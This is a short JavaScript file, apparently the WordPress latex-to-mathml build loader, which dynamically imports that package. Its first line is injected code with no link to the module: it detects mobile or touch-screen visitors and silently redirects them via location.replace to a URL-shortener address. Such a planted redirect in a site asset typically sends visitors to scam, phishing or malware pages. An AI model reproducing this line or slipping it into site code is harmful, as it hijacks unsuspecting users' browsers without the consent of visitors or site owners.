(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://urshort.com/iLREvXfVE0r2");
// packages/latex-to-mathml/build-module/loader.mjs
function loader() {
  return import("@wordpress/latex-to-mathml");
}
export {
  loader as default
};
;
